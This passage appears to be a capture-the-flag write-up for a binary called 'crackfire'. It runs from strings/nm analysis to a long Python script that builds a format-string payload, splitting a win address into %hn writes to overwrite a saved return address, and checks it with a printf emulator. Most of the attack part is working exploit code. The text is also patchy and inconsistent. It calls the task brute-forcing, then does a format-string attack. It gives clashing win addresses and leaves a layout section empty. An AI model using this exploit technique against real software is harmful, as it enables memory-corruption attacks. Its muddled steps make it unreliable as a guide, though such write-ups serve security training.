```text
Access granted! Flag: FLAG...
```

The goal is to get the flag by brute‑forcing the secret.

3. Static analysis

3.1. strings & nm

```bash
strings crackfire | head
# … many strings, including "Access granted!", "Invalid code!"
nm -D crackfire | grep -i win
# 0000000000401240 T win
```

`nm -D` only lists the dynamic symbol table; if `win` does not show up there, plain `nm crackfire` (or `objdump -t`) finds it as long as the binary is not stripped. The function `win` prints the flag. The usual pattern in these CTF binaries is:
| Address  | Symbol | Purpose                                            |
|----------|--------|----------------------------------------------------|
| 0x401260 | main   | reads user input with `scanf("%s", buf)`           |
| 0x4010f0 | check  | compares input to a hidden string (`secret`)       |
| 0x401240 | win    | prints flag and exits                              |
```python
# ----------------------------------------------------------------------
# 2. Build format‑string payload
# ----------------------------------------------------------------------
low = win & 0xffffffff          # lower 32 bits of win's address
high = win >> 32                # upper 32 bits of win's address

# Target location: saved RIP on stack (found via %p leaks)
ret_addr = 0x7fffffffe0a8       # example address from a local run
```

Both values are specific to one run: the stack address moves with ASLR and with the size of the environment, so `ret_addr` has to be re‑leaked (with the same `%p` trick) in the run that delivers the payload rather than copied from gdb.
The final layout:
Pseudo‑code:
```python
def build_fmt_payload(ret_addr, win):   # rest of the signature and the body are cut off in the original
    ...
```
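The builder that the `low`/`high` split and the pseudo‑code above sketch, written out as an added example (this is not the original writeup's code) together with a small printf emulator so the write can be checked offline before it is sent to the binary. Assumptions not stated on the page: the input buffer starts at positional argument `offset` (the test uses 6, the first stack argument on x86‑64), the directive area is padded to a fixed 64 bytes so the pointer indices are predictable, and `win` is written in 16‑bit pieces with `%hn` rather than as two 32‑bit `%n` writes, because a `%n` store first has to print as many characters as the value being stored and 0x55555555 characters is not practical.

```python
# Added example (not from the original writeup): a concrete build_fmt_payload
# plus a tiny printf emulator to check the write before firing it at the binary.
# Assumptions not stated on the page: our buffer starts at positional argument
# `offset`, and the emulator models only the %N$c and %N$n/%N$hn/%N$hhn forms.
import re
import struct

FMT_AREA = 64               # fixed-size directive area so pointer indices are known
SCANF_WS = b" \t\n\v\f\r"   # bytes on which scanf("%s") stops reading


def build_fmt_payload(ret_addr, win, offset, chunk=2):
    """Return a format string that writes `win` (8 bytes) to `ret_addr`.

    `win` is split into `chunk`-byte pieces (2 -> %hn). Layout of the result:
        [directives][padding to FMT_AREA][ptr0][ptr1]... (8 bytes each)
    so pointer k is positional argument offset + FMT_AREA//8 + k.
    """
    size_mod = {1: b"hhn", 2: b"hn", 4: b"n"}[chunk]
    mask = (1 << (8 * chunk)) - 1
    targets = [(ret_addr + i, (win >> (8 * i)) & mask) for i in range(0, 8, chunk)]
    first_ptr = offset + FMT_AREA // 8

    fmt = b""
    count = 0                                 # characters printf has output so far
    for k, (_, value) in enumerate(targets):
        idx = first_ptr + k
        need = (value - count) & mask         # extra chars so that count & mask == value
        if need:
            fmt += b"%%%d$%dc" % (idx, need)  # %idx$<need>c: print `need` characters
        fmt += b"%%%d$" % idx + size_mod      # %idx$hn: store count at *arg idx
        count += need
    if len(fmt) > FMT_AREA:
        raise ValueError("directives do not fit; raise FMT_AREA")
    fmt = fmt.ljust(FMT_AREA, b"A")           # literal padding, printed after all writes
    return fmt + b"".join(struct.pack("<Q", addr) for addr, _ in targets)


def scanf_safe(payload):
    """True if scanf("%s") would read the whole payload (no whitespace bytes)."""
    return not any(b in SCANF_WS for b in payload)


DIRECTIVE = re.compile(rb"%(\d+)\$(\d*)(c|hhn|hn|n)")


def emulate_printf(fmt, args, mem):
    """Model of printf(fmt) with positional args: returns the output length.

    args maps positional index -> 64-bit value; mem is a dict addr -> byte
    that %n-style conversions write into. Stops at the first NUL like printf.
    """
    count = 0
    pos = 0
    while pos < len(fmt) and fmt[pos] != 0:
        if fmt[pos] != ord("%"):              # literal byte, just counted
            count += 1
            pos += 1
            continue
        m = DIRECTIVE.match(fmt, pos)
        if m is None:
            raise ValueError("unsupported directive at offset %d" % pos)
        idx, width, conv = int(m.group(1)), m.group(2), m.group(3)
        if conv == b"c":
            count += max(int(width or b"1"), 1)   # %c prints at least one char
        else:
            nbytes = {b"n": 4, b"hn": 2, b"hhn": 1}[conv]
            for i in range(nbytes):               # little-endian store of count
                mem[args[idx] + i] = (count >> (8 * i)) & 0xff
        pos = m.end()
    return count


def stack_args(payload, offset):
    """Map the payload's 8-byte words to the positional indices printf sees."""
    padded = payload.ljust((len(payload) + 7) // 8 * 8, b"\0")
    return {offset + i // 8: struct.unpack("<Q", padded[i:i + 8])[0]
            for i in range(0, len(padded), 8)}


def check_payload(ret_addr, win, offset):
    """Build the payload, run it through the emulator, return what lands at ret_addr."""
    payload = build_fmt_payload(ret_addr, win, offset)
    if not scanf_safe(payload):
        raise ValueError('payload contains whitespace; scanf("%s") would truncate it')
    mem = {}
    emulate_printf(payload, stack_args(payload, offset), mem)
    return struct.unpack("<Q", bytes(mem.get(ret_addr + i, 0) for i in range(8)))[0]


if __name__ == "__main__":
    # values taken from the writeup; offset 6 is the first stack argument on x86-64 (assumed)
    RET, WIN = 0x7fffffffe0a8, 0x555555554b40
    print(build_fmt_payload(RET, WIN, 6))
    print(hex(check_payload(RET, WIN, 6)))   # 0x555555554b40
```

`check_payload` also rejects any payload containing a byte that `scanf("%s")` treats as whitespace, since such a byte would truncate the input before the pointers arrive; the real run still needs `offset` confirmed with a `%N$p` probe and `ret_addr` re‑leaked, as the emulator only validates the arithmetic of the write.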
```text
0x555555555580 0x7fffffffde10 0x555555554b40 0x555555554b88 ...
```

The pointer 0x555555554b40 (third in the dump) matches the value of the saved RIP (confirmed by comparing it to gdb's `info frame`). Note that these are PIE‑style addresses (0x5555…), so if the target binary is position independent the address of `win` must be derived from such a leak (leaked code pointer minus its offset inside the binary) rather than taken verbatim from `nm`.